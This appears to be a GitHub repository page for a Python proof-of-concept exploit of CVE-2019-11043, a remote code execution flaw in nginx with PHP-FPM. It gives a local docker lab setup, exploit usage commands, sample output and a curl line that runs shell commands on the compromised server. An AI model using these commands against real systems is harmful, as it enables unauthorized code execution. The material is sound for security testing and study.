Skip to content
master
Switch branches/tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
Oct 28, 2019
php
Oct 28, 2019
Oct 28, 2019

PoC CVE-2019-11043

A Python version of the CVE-2019-11043 exploit https://github.com/neex/phuip-fpizdam
This PoC is still a draft, please use the exploit written by @neex
Vulnerability Analysis: https://paper.seebug.org/1064/

PoC Setup

Just run docker compose to bring up nginx and php-fpm:

# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

if you wish to read php-fpm logs, you could run:

docker logs --tail 10 --follow php

Exploit

# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

If you want to check the vulnerability only, skipping the exploit:

python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

You can try to kill php-fpm process and reset all injected PHP settings with --reset:

python3 exploit.py --url http://localhost/index.php --reset

Video PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

About

(PoC) Python version of CVE-2019-11043 exploit by neex

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published